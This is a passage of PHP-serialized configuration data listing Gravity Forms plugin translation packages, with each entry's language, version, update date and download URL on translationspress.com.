(Portugal)\";s:11:\"native_name\";s:10:\"Português\";s:7:\"package\";s:117:\"https://packages.translationspress.com/rocketgenius/gravityformsconstantcontact/gravityformsconstantcontact-pt_PT.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"pt\";}}s:2:\"ru\";a:7:{s:8:\"language\";s:5:\"ru_RU\";s:7:\"version\";s:3:\"1.5\";s:7:\"updated\";s:25:\"2020-10-29T05:29:40+00:00\";s:12:\"english_name\";s:7:\"Russian\";s:11:\"native_name\";s:14:\"Русский\";s:7:\"package\";s:117:\"https://packages.translationspress.com/rocketgenius/gravityformsconstantcontact/gravityformsconstantcontact-ru_RU.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"ru\";i:1;s:3:\"rus\";}}s:2:\"es\";a:7:{s:8:\"language\";s:5:\"es_ES\";s:7:\"version\";s:3:\"1.5\";s:7:\"updated\";s:25:\"2023-01-06T17:48:51+00:00\";s:12:\"english_name\";s:15:\"Spanish (Spain)\";s:11:\"native_name\";s:8:\"Español\";s:7:\"package\";s:117:\"https://packages.translationspress.com/rocketgenius/gravityformsconstantcontact/gravityformsconstantcontact-es_ES.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"es\";i:1;s:3:\"spa\";i:2;s:3:\"spa\";}}s:2:\"sv\";a:7:{s:8:\"language\";s:5:\"sv_SE\";s:7:\"version\";s:3:\"1.5\";s:7:\"updated\";s:25:\"2020-10-23T18:56:46+00:00\";s:12:\"english_name\";s:7:\"Swedish\";s:11:\"native_name\";s:7:\"Svenska\";s:7:\"package\";s:117:\"https://packages.translationspress.com/rocketgenius/gravityformsconstantcontact/gravityformsconstantcontact-sv_SE.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"sv\";i:1;s:3:\"swe\";}}s:2:\"tr\";a:7:{s:8:\"language\";s:5:\"tr_TR\";s:7:\"version\";s:3:\"1.5\";s:7:\"updated\";s:25:\"2023-01-06T17:49:39+00:00\";s:12:\"english_name\";s:7:\"Turkish\";s:11:\"native_name\";s:8:\"Türkçe\";s:7:\"package\";s:117:\"https://packages.translationspress.com/rocketgenius/gravityformsconstantcontact/gravityformsconstantcontact-tr_TR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"tr\";i:1;s:3:\"tur\";}}s:2:\"uk\";a:7:{s:8:\"language\";s:2:\"uk\";s:7:\"version\";s:3:\"1.5\";s:7:\"updated\";s:25:\"2023-01-06T17:49:41+00:00\";s:12:\"english_name\";s:9:\"Ukrainian\";s:11:\"native_name\";s:20:\"Українська\";s:7:\"package\";s:114:\"https://packages.translationspress.com/rocketgenius/gravityformsconstantcontact/gravityformsconstantcontact-uk.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"uk\";i:1;s:3:\"ukr\";}}}}s:12:\"gravityforms\";a:1:{s:12:\"translations\";a:27:{s:2:\"ar\";a:7:{s:8:\"language\";s:2:\"ar\";s:7:\"version\";s:7:\"2.7.4.1\";s:7:\"updated\";s:25:\"2023-03-02T20:25:20+00:00\";s:12:\"english_name\";s:6:\"Arabic\";s:11:\"native_name\";s:14:\"العربية\";s:7:\"package\";s:84:\"https://packages.translationspress.com/rocketgenius/gravityforms/gravityforms-ar.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"ar\";i:1;s:3:\"ara\";}}s:2:\"bg\";a:7:{s:8:\"language\";s:5:\"bg_BG\";s:7:\"version\";s:7:\"2.7.4.1\";s:7:\"updated\";s:25:\"2023-04-15T14:49:49+00:00\";s:12:\"english_name\";s:9:\"Bulgarian\";s:11:\"native_name\";s:18:\"Български\";s:7:\"package\";s:87:\"https://packages.translationspress.com/rocketgenius/gravityforms/gravityforms-bg_BG.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"bg\";i:1;s:3:\"bul\";}}s:2:\"ca\";a:7:{s:8:\"language\";s:2:\"ca\";s:7:\"version\";s:7:\"2.7.4.1\";s:7:\"updated\";s:25:\"2023-01-26T08:11:26+00:00\";s:12:\"english_name\";s:7:\"Catalan\";s:11:\"native_name\";s:7:\"Català\";s:7:\"package\";s:84:\"https://packages.translationspress.com/rocketgenius/gravityforms/gravityforms-ca.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"ca\";i:1;s:3:\"cat\";}}s:5:\"zh-cn\";a:7:{s:8:\"language\";s:5:\"zh_CN\";s:7:\"version\";s:7:\"2.7.4.1\";s:7:\"updated\";s:25:\"2023-03-02T20:26:56+00:00\";s:12:\"english_name\";s:15:\"Chinese (China)\";s:11:\"native_name\";s:12:\"简体中文\";s:7:\"package\";s:87:\"https://packages.translationspress.com/rocketgenius/gravityforms/gravityforms-zh_CN.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"zh\";i:1;s:3:\"zho\";}}s:5:\"zh-hk\";a:7:{s:8:\"language\";s:5:\"zh_HK\";s:7:\"version\";s:7:\"2.7.4.1\";s:7:\"updated\";s:25:\"2023-01-26T08:32:36+00:00\";s:12:\"english_name\";s:19:\"Chinese (Hong Kong)\";s:11:\"native_name\";s:16:\"香港中文版	\";s:7:\"package\";s:87:\"https://packages.translationspress.com/rocketgenius/gravityforms/gravityforms-zh_HK.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"zh\";i:1;s:3:\"zho\";}}s:2:\"da\";a:7:{s:8:\"language\";s:5:\"da_DK\";s:7:\"version\";s:7:\"2.7.4.1\";s:7:\"updated\";s:25:\"2023-03-02T20:25:25+00:00\";s:12:\"english_name\";s:6:\"Danish\";s:11:\"native_name\";s:5:\"Dansk\";s:7:\"package\";s:87:\"https://packages.translationspress.com/rocketgenius/gravityforms/gravityforms-da_DK.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"da\";i:1;s:3:\"dan\";}}s:2:\"nl\";a:7:{s:8:\"language\";s:5:\"nl_NL\";s:7:\"version\";s:7:\"2.7.4.1\";s:7:\"updated\";s:25:\"2023-03-06T09:34:53+00:00\";s:12:\"english_name\";s:5:\"Dutch\";s:11:\"native_name\";s:10:\"Nederlands\";s:7:\"package\";s:87:\"https://packages.translationspress.com/rocketgenius/gravityforms/gravityforms-nl_NL.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"nl\";i:1;s:3:\"nld\";}}s:5:\"en-au\";a:7:{s:8:\"language\";s:5:\"en_AU\";s:7:\"version\";s:7:\"2.7.4.1\";s:7:\"updated\";s:25:\"2023-03-02T20:25:40+00:00\";s:12:\"english_name\";s:19:\"English (Australia)\";s:11:\"native_name\";s:19:\"English (Australia)\";s:7:\"package\";s:87:\"https://packages.translationspress.com/rocketgenius/gravityforms/gravityforms-en_AU.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"en\";i:1;s:3:\"eng\";i:2;s:3:\"eng\";}}s:5:\"en-gb\";a:7:{s:8:\"language\";s:5:\"en_GB\";s:7:\"version\";s:7:\"2.7.4.1\";s:7:\"updated\";s:25:\"2023-03-02T20:25:43+00:00\";s:12:\"english_name\";s:12:\"English (UK)\";s:11:\"native_name\";s:12:\"English (UK)\";s:7:\"package\";s:87:\"https://packages.translationspress.com/rocketgenius/gravityforms/gravityforms-en_GB.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"en\";i:1;s:3:\"eng\";i:2;s:3:\"eng\";}}s:2:\"fi\";a:7:{s:8:\"language\";s:2:\"fi\";s:7:\"version\";s:7:\"2.7.4.1\";s:7:\"updated\";s:25:\"2023-03-16T08:55:27+00:00\";s:12:\"english_name\";s:7:\"Finnish\";s:11:\"native_name\";s:5:\"Suomi\";s:7:\"package\";s:84:\"https://packages.translationspress.com/rocketgenius/gravityforms/gravityforms-fi.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"fi\";i:1;s:3:\"fin\";}}s:5:\"fr-ca\";a:7:{s:8:\"language\";s:5:\"fr_CA\";s:7:\"version\";s:7:\"2.7.4.1\";s:7:\"updated\";s:25:\"2023-01-26T08:17:09+00:00\";s:12:\"english_name\";s:15:\"French (Canada)\";s:11:\"native_name\";s:19:\"Français du Canada\";s:7:\"package\";s:87:\"https://packages.translationspress.com/rocketgenius/gravityforms/gravityforms-fr_CA.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"fr\";i:1;s:3:\"fra\";}}s:2:\"fr\";a:7:{s:8:\"language\";s:5:\"fr_FR\";s:7:\"version\";s:7:\"2.7.4.1\";s:7:\"updated\";s:25:\"2023-03-10T11:08:46+00:00\";s:12:\"english_name\";s:15:\"French (France)\";s:11:\"native_name\";s:9:\"Français\";s:7:\"package\";s:87:\"https://packages.translationspress.com/rocketgenius/gravityforms/gravityforms-fr_FR.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"fr\";}}s:2:\"de\";a:7:{s:8:\"language\";s:5:\"de_DE\";s:7:\"version\";s:7:\"2.7.4.1\";s:7:\"updated\";s:25:\"2023-04-15T11:54:37+00:00\";s:12:\"english_name\";s:6:\"German\";s:11:\"native_name\";s:7:\"Deutsch\";s:7:\"package\";s:87:\"https://packages.translationspress.com/rocketgenius/gravityforms/gravityforms-de_DE.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"de\";}}s:9:\"de/formal\";a:7:{s:8:\"language\";s:12:\"de_DE_formal\";s:7:\"version\";s:7:\"2.7.4.1\";s:7:\"updated\";s:25:\"2023-04-05T08:33:44+00:00\";s:12:\"english_name\";s:15:\"German (Formal)\";s:11:\"native_name\";s:13:\"Deutsch (Sie)\";s:7:\"package\";s:94:\"https://packages.translationspress.com/rocketgenius/gravityforms/gravityforms-de_DE_formal.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"de\";}}s:2:\"he\";a:7:{s:8:\"language\";s:5:\"he_IL\";s:7:\"version\";s:7:\"2.7.4.1\";s:7:\"updated\";s:25:\"2023-03-02T20:26:01+00:00\";s:12:\"english_name\";s:6:\"Hebrew\";s:11:\"native_name\";s:16:\"עִבְרִית\";s:7:\"package\";s:87:\"https://packages.translationspress.com/rocketgenius/gravityforms/gravityforms-he_IL.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"he\";}}s:2:\"hi\";a:7:{s:8:\"language\";s:5:\"hi_IN\";s:7:\"version\";s:7:\"2.7.4.1\";s:7:\"updated\";s:25:\"2023-03-13T18:42:07+00:00\";s:12:\"english_name\";s:5:\"Hindi\";s:11:\"native_name\";s:18:\"हिन्दी\";s:7:\"package\";s:87:\"https://packages.translationspress.com/rocketgenius/gravityforms/gravityforms-hi_IN.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"hi\";i:1;s:3:\"hin\";}}s:2:\"hu\";a:7:{s:8:\"language\";s:5:\"hu_HU\";s:7:\"version\";s:7:\"2.7.4.1\";s:7:\"updated\";s:25:\"2023-01-26T08:19:30+00:00\";s:12:\"english_name\";s:9:\"Hungarian\";s:11:\"native_name\";s:6:\"Magyar\";s:7:\"package\";s:87:\"https://packages.translationspress.com/rocketgenius/gravityforms/gravityforms-hu_HU.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"hu\";i:1;s:3:\"hun\";}}s:2:\"it\";a:7:{s:8:\"language\";s:5:\"it_IT\";s:7:\"version\";s:7:\"2.7.4.1\";s:7:\"updated\";s:25:\"2023-03-19T18:27:24+00:00\";s:12:\"english_name\";s:7:\"Italian\";s:11:\"native_name\";s:8:\"Italiano\";s:7:\"package\";s:87:\"https://packages.translationspress.com/rocketgenius/gravityforms/gravityforms-it_IT.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"it\";i:1;s:3:\"ita\";}}s:2:\"ja\";a:7:{s:8:\"language\";s:2:\"ja\";s:7:\"version\";s:7:\"2.7.4.1\";s:7:\"updated\";s:25:\"2023-03-26T18:23:00+00:00\";s:12:\"english_name\";s:8:\"Japanese\";s:11:\"native_name\";s:9:\"日本語\";s:7:\"package\";s:84:\"https://packages.translationspress.com/rocketgenius/gravityforms/gravityforms-ja.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"ja\";}}s:2:\"nb\";a:7:{s:8:\"language\";s:5:\"nb_NO\";s:7:\"version\";s:7:\"2.7.4.1\";s:7:\"updated\";s:25:\"2023-03-02T20:26:37+00:00\";s:12:\"english_name\";s:19:\"Norwegian (Bokmål)\";s:11:\"native_name\";s:13:\"Norsk bokmål\";s:7:\"package\";s:87:\"https://packages.translationspress.com/rocketgenius/gravityforms/gravityforms-nb_NO.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"nb\";i:1;s:3:\"nob\";}}s:2:\"pl\";a:7:{s:8:\"language\";s:5:\"pl_PL\";s:7:\"version\";s:7:\"2.7.4.1\";s:7:\"updated\";s:25:\"2023-03-02T20:26:43+00:00\";s:12:\"english_name\";s:6:\"Polish\";s:11:\"native_name\";s:6:\"Polski\";s:7:\"package\";s:87:\"https://packages.translationspress.com/rocketgenius/gravityforms/gravityforms-pl_PL.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"pl\";i:1;s:3:\"pol\";}}s:5:\"pt-br\";a:7:{s:8:\"language\";s:5:\"pt_BR\";s:7:\"version\";s:7:\"2.7.4.1\";s:7:\"updated\";s:25:\"2023-03-12T15:11:31+00:00\";s:12:\"english_name\";s:19:\"Portuguese (Brazil)\";s:11:\"native_name\";s:20:\"Português do Brasil\";s:7:\"package\";s:87:\"https://packages.translationspress.com/rocketgenius/gravityforms/gravityforms-pt_BR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"pt\";i:1;s:3:\"por\";}}s:2:\"pt\";a:7:{s:8:\"language\";s:5:\"pt_PT\";s:7:\"version\";s:7:\"2.7.4.1\";s:7:\"updated\";s:25:\"2023-03-21T13:04:13+00:00\";s:12:\"english_name\";s:21:\"Portuguese (Portugal)\";s:11:\"native_name\";s:10:\"Português\";s:7:\"package\";s:87:\"https://packages.translationspress.com/rocketgenius/gravityforms/gravityforms-pt_PT.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"pt\";}}s:2:\"ru\";a:7:{s:8:\"language\";s:5:\"ru_RU\";s:7:\"version\";s:7:\"2.7.4.1\";s:7:\"updated\";s:25:\"2023-03-15T02:44:29+00:00\";s:12:\"english_name\";s:7:\"Russian\";s:11:\"native_name\";s:14:\"Русский\";s:7:\"package\";s:87:\"https://packages.translationspress.com/rocketgenius/gravityforms/gravityforms-ru_RU.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"ru\";i:1;s:3:\"rus\";}}s:2:\"es\";a:7:{s:8:\"language\";s:5:\"es_ES\";s:7:\"version\";s:7:\"2.7.4.1\";s:7:\"updated\";s:25:\"2023-03-20T18:41:19+00:00\";s:12:\"english_name\";s:15:\"Spanish (Spain)\";s:11:\"native_name\";s:8:\"Español\";s:7:\"package\";s:87:\"https://packages.translationspress.com/rocketgenius/gravityforms/gravityforms-es_ES.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"es\";i:1;s:3:\"spa\";i:2;s:3:\"spa\";}}s:2:\"sv\";a:7:{s:8:\"language\";s:5:\"sv_SE\";s:7:\"version\";s:7:\"2.7.4.1\";s:7:\"updated\";s:25:\"2023-03-25T07:06:24+00:00\";s:12:\"english_name\";s:7:\"Swedish\";s:11:\"native_name\";s:7:\"Svenska\";s:7:\"package\";s:87:\"https://packages.translationspress.com/rocketgenius/gravityforms/gravityforms-sv_SE.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"sv\";i:1;s:3:\"swe\";}}s:2:\"tr\";a:7:{s:8:\"language\";s:5:\"tr_TR\";s:7:\"version\";s:7:\"2.7.4.1\";s:7:\"updated\";s:25:\"2023-03-20T20:13:07+00:00\";s:12:\"english_name\";s:7:\"Turkish\";s:11:\"native_name\";s:8:\"Türkçe\";s:7:\"package\";s:87:\"https://packages.translationspress.com/rocketgenius/gravityforms/gravityforms-tr_TR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"tr\";i:1;s:3:\"tur\";}}}}s:21:\"gravityformsrecaptcha\";a:1:{s:12:\"translations\";a:17:{s:5:\"zh-hk\";a:7:{s:8:\"language\";s:5:\"zh_HK\";s:7:\"version\";s:5:\"1.1.2\";s:7:\"updated\";s:25:\"2023-03-02T20:54:35+00:00\";s:12:\"english_name\";s:19:\"Chinese (Hong Kong)\";s:11:\"native_name\";s:16:\"香港中文版	\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityformsrecaptcha/gravityformsrecaptcha-zh_HK.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"zh\";i:1;s:3:\"zho\";}}s:2:\"nl\";a:7:{s:8:\"language\";s:5:\"nl_NL\";s:7:\"version\";s:5:\"1.1.2\";s:7:\"updated\";s:25:\"2021-06-02T13:30:24+00:00\";s:12:\"english_name\";s:5:\"Dutch\";s:11:\"native_name\";s:10:\"Nederlands\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityformsrecaptcha/gravityformsrecaptcha-nl_NL.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"nl\";i:1;s:3:\"nld\";}}s:2:\"fi\";a:7:{s:8:\"language\";s:2:\"fi\";s:7:\"version\";s:5:\"1.1.2\";s:7:\"updated\";s:25:\"2021-08-12T07:58:23+00:00\";s:12:\"english_name\";s:7:\"Finnish\";s:11:\"native_name\";s:5:\"Suomi\";s:7:\"package\";s:102:\"https://packages.translationspress.com/rocketgenius/gravityformsrecaptcha/gravityformsrecaptcha-fi.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"fi\";i:1;s:3:\"fin\";}}s:5:\"fr-ca\";a:7:{s:8:\"language\";s:5:\"fr_CA\";s:7:\"version\";s:5:\"1.1.2\";s:7:\"updated\";s:25:\"2023-03-02T20:54:21+00:00\";s:12:\"english_name\";s:15:\"French (Canada)\";s:11:\"native_name\";s:19:\"Français du Canada\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityformsrecaptcha/gravityformsrecaptcha-fr_CA.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"fr\";i:1;s:3:\"fra\";}}s:2:\"fr\";a:7:{s:8:\"language\";s:5:\"fr_FR\";s:7:\"version\";s:5:\"1.1.2\";s:7:\"updated\";s:25:\"2021-06-02T13:26:19+00:00\";s:12:\"english_name\";s:15:\"French (France)\";s:11:\"native_name\";s:9:\"Français\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityformsrecaptcha/gravityformsrecaptcha-fr_FR.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"fr\";}}s:2:\"de\";a:7:{s:8:\"language\";s:5:\"de_DE\";s:7:\"version\";s:5:\"1.1.2\";s:7:\"updated\";s:25:\"2021-06-02T13:23:08+00:00\";s:12:\"english_name\";s:6:\"German\";s:11:\"native_name\";s:7:\"Deutsch\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityformsrecaptcha/gravityformsrecaptcha-de_DE.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"de\";}}s:2:\"he\";a:7:{s:8:\"language\";s:5:\"he_IL\";s:7:\"version\";s:5:\"1.1.2\";s:7:\"updated\";s:25:\"2021-06-02T13:26:50+00:00\";s:12:\"english_name\";s:6:\"Hebrew\";s:11:\"native_name\";s:16:\"עִבְרִית\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityformsrecaptcha/gravityformsrecaptcha-he_IL.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"he\";}}s:2:\"hi\";a:7:{s:8:\"language\";s:5:\"hi_IN\";s:7:\"version\";s:5:\"1.1.2\";s:7:\"updated\";s:25:\"2023-01-06T17:52:00+00:00\";s:12:\"english_name\";s:5:\"Hindi\";s:11:\"native_name\";s:18:\"हिन्दी\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityformsrecaptcha/gravityformsrecaptcha-hi_IN.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"hi\";i:1;s:3:\"hin\";}}s:2:\"it\";a:7:{s:8:\"language\";s:5:\"it_IT\";s:7:\"version\";s:5:\"1.1.2\";s:7:\"updated\";s:25:\"2021-06-02T13:28:22+00:00\";s:12:\"english_name\";s:7:\"Italian\";s:11:\"native_name\";s:8:\"Italiano\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityformsrecaptcha/gravityformsrecaptcha-it_IT.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"it\";i:1;s:3:\"ita\";}}s:2:\"ja\";a:7:{s:8:\"language\";s:2:\"ja\";s:7:\"version\";s:5:\"1.1.2\";s:7:\"updated\";s:25:\"2021-06-04T07:24:55+00:00\";s:12:\"english_name\";s:8:\"Japanese\";s:11:\"native_name\";s:9:\"日本語\";s:7:\"package\";s:102:\"https://packages.translationspress.com/rocketgenius/gravityformsrecaptcha/gravityformsrecaptcha-ja.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"ja\";}}s:2:\"pl\";a:7:{s:8:\"language\";s:5:\"pl_PL\";s:7:\"version\";s:5:\"1.1.2\";s:7:\"updated\";s:25:\"2021-10-02T10:47:18+00:00\";s:12:\"english_name\";s:6:\"Polish\";s:11:\"native_name\";s:6:\"Polski\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityformsrecaptcha/gravityformsrecaptcha-pl_PL.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"pl\";i:1;s:3:\"pol\";}}s:5:\"pt-br\";a:7:{s:8:\"language\";s:5:\"pt_BR\";s:7:\"version\";s:5:\"1.1.2\";s:7:\"updated\";s:25:\"2021-06-02T13:31:24+00:00\";s:12:\"english_name\";s:19:\"Portuguese (Brazil)\";s:11:\"native_name\";s:20:\"Português do Brasil\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityformsrecaptcha/gravityformsrecaptcha-pt_BR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"pt\";i:1;s:3:\"por\";}}s:2:\"pt\";a:7:{s:8:\"language\";s:5:\"pt_PT\";s:7:\"version\";s:5:\"1.1.2\";s:7:\"updated\";s:25:\"2021-06-02T13:31:56+00:00\";s:12:\"english_name\";s:21:\"Portuguese (Portugal)\";s:11:\"native_name\";s:10:\"Português\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityformsrecaptcha/gravityformsrecaptcha-pt_PT.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"pt\";}}s:2:\"ru\";a:7:{s:8:\"language\";s:5:\"ru_RU\";s:7:\"version\";s:5:\"1.1.2\";s:7:\"updated\";s:25:\"2021-06-02T13:32:29+00:00\";s:12:\"english_name\";s:7:\"Russian\";s:11:\"native_name\";s:14:\"Русский\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityformsrecaptcha/gravityformsrecaptcha-ru_RU.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"ru\";i:1;s:3:\"rus\";}}s:2:\"es\";a:7:{s:8:\"language\";s:5:\"es_ES\";s:7:\"version\";s:5:\"1.1.2\";s:7:\"updated\";s:25:\"2021-06-02T13:24:39+00:00\";s:12:\"english_name\";s:15:\"Spanish (Spain)\";s:11:\"native_name\";s:8:\"Español\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityformsrecaptcha/gravityformsrecaptcha-es_ES.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"es\";i:1;s:3:\"spa\";i:2;s:3:\"spa\";}}s:2:\"sv\";a:7:{s:8:\"language\";s:5:\"sv_SE\";s:7:\"version\";s:5:\"1.1.2\";s:7:\"updated\";s:25:\"2021-06-05T20:09:56+00:00\";s:12:\"english_name\";s:7:\"Swedish\";s:11:\"native_name\";s:7:\"Svenska\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityformsrecaptcha/gravityformsrecaptcha-sv_SE.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"sv\";i:1;s:3:\"swe\";}}s:2:\"tr\";a:7:{s:8:\"language\";s:5:\"tr_TR\";s:7:\"version\";s:5:\"1.1.2\";s:7:\"updated\";s:25:\"2021-06-02T13:33:36+00:00\";s:12:\"english_name\";s:7:\"Turkish\";s:11:\"native_name\";s:8:\"Türkçe\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityformsrecaptcha/gravityformsrecaptcha-tr_TR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"tr\";i:1;s:3:\"tur\";}}}}s:22:\"gravityformsmoderation\";a:1:{s:12:\"translations\";a:12:{s:2:\"nl\";a:7:{s:8:\"language\";s:5:\"nl_NL\";s:7:\"version\";s:3:\"1.0\";s:7:\"updated\";s:25:\"2023-03-05T09:54:50+00:00\";s:12:\"english_name\";s:5:\"Dutch\";s:11:\"native_name\";s:10:\"Nederlands\";s:7:\"package\";s:107:\"https://packages.translationspress.com/rocketgenius/gravityformsmoderation/gravityformsmoderation-nl_NL.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"nl\";i:1;s:3:\"nld\";}}s:2:\"fr\";a:7:{s:8:\"language\";s:5:\"fr_FR\";s:7:\"version\";s:3:\"1.0\";s:7:\"updated\";s:25:\"2023-03-12T12:54:41+00:00\";s:12:\"english_name\";s:15:\"French (France)\";s:11:\"native_name\";s:9:\"Français\";s:7:\"package\";s:107:\"https://packages.translationspress.com/rocketgenius/gravityformsmoderation/gravityformsmoderation-fr_FR.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"fr\";}}s:2:\"de\";a:7:{s:8:\"language\";s:5:\"de_DE\";s:7:\"version\";s:3:\"1.0\";s:7:\"updated\";s:25:\"2023-03-20T13:44:40+00:00\";s:12:\"english_name\";s:6:\"German\";s:11:\"native_name\";s:7:\"Deutsch\";s:7:\"package\";s:107:\"https://packages.translationspress.com/rocketgenius/gravityformsmoderation/gravityformsmoderation-de_DE.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"de\";}}s:2:\"hi\";a:7:{s:8:\"language\";s:5:\"hi_IN\";s:7:\"version\";s:3:\"1.0\";s:7:\"updated\";s:25:\"2023-03-07T10:56:35+00:00\";s:12:\"english_name\";s:5:\"Hindi\";s:11:\"native_name\";s:18:\"हिन्दी\";s:7:\"package\";s:107:\"https://packages.translationspress.com/rocketgenius/gravityformsmoderation/gravityformsmoderation-hi_IN.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"hi\";i:1;s:3:\"hin\";}}s:2:\"it\";a:7:{s:8:\"language\";s:5:\"it_IT\";s:7:\"version\";s:3:\"1.0\";s:7:\"updated\";s:25:\"2023-03-16T12:07:04+00:00\";s:12:\"english_name\";s:7:\"Italian\";s:11:\"native_name\";s:8:\"Italiano\";s:7:\"package\";s:107:\"https://packages.translationspress.com/rocketgenius/gravityformsmoderation/gravityformsmoderation-it_IT.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"it\";i:1;s:3:\"ita\";}}s:2:\"ja\";a:7:{s:8:\"language\";s:2:\"ja\";s:7:\"version\";s:3:\"1.0\";s:7:\"updated\";s:25:\"2023-03-23T05:49:28+00:00\";s:12:\"english_name\";s:8:\"Japanese\";s:11:\"native_name\";s:9:\"日本語\";s:7:\"package\";s:104:\"https://packages.translationspress.com/rocketgenius/gravityformsmoderation/gravityformsmoderation-ja.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"ja\";}}s:5:\"pt-br\";a:7:{s:8:\"language\";s:5:\"pt_BR\";s:7:\"version\";s:3:\"1.0\";s:7:\"updated\";s:25:\"2023-03-12T14:43:23+00:00\";s:12:\"english_name\";s:19:\"Portuguese (Brazil)\";s:11:\"native_name\";s:20:\"Português do Brasil\";s:7:\"package\";s:107:\"https://packages.translationspress.com/rocketgenius/gravityformsmoderation/gravityformsmoderation-pt_BR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"pt\";i:1;s:3:\"por\";}}s:2:\"pt\";a:7:{s:8:\"language\";s:5:\"pt_PT\";s:7:\"version\";s:3:\"1.0\";s:7:\"updated\";s:25:\"2023-03-20T16:25:23+00:00\";s:12:\"english_name\";s:21:\"Portuguese (Portugal)\";s:11:\"native_name\";s:10:\"Português\";s:7:\"package\";s:107:\"https://packages.translationspress.com/rocketgenius/gravityformsmoderation/gravityformsmoderation-pt_PT.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"pt\";}}s:2:\"ru\";a:7:{s:8:\"language\";s:5:\"ru_RU\";s:7:\"version\";s:3:\"1.0\";s:7:\"updated\";s:25:\"2023-03-14T15:50:45+00:00\";s:12:\"english_name\";s:7:\"Russian\";s:11:\"native_name\";s:14:\"Русский\";s:7:\"package\";s:107:\"https://packages.translationspress.com/rocketgenius/gravityformsmoderation/gravityformsmoderation-ru_RU.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"ru\";i:1;s:3:\"rus\";}}s:2:\"es\";a:7:{s:8:\"language\";s:5:\"es_ES\";s:7:\"version\";s:3:\"1.0\";s:7:\"updated\";s:25:\"2023-03-20T18:20:16+00:00\";s:12:\"english_name\";s:15:\"Spanish (Spain)\";s:11:\"native_name\";s:8:\"Español\";s:7:\"package\";s:107:\"https://packages.translationspress.com/rocketgenius/gravityformsmoderation/gravityformsmoderation-es_ES.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"es\";i:1;s:3:\"spa\";i:2;s:3:\"spa\";}}s:2:\"sv\";a:7:{s:8:\"language\";s:5:\"sv_SE\";s:7:\"version\";s:3:\"1.0\";s:7:\"updated\";s:25:\"2023-03-24T08:15:38+00:00\";s:12:\"english_name\";s:7:\"Swedish\";s:11:\"native_name\";s:7:\"Svenska\";s:7:\"package\";s:107:\"https://packages.translationspress.com/rocketgenius/gravityformsmoderation/gravityformsmoderation-sv_SE.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"sv\";i:1;s:3:\"swe\";}}s:2:\"tr\";a:7:{s:8:\"language\";s:5:\"tr_TR\";s:7:\"version\";s:3:\"1.0\";s:7:\"updated\";s:25:\"2023-03-06T09:18:21+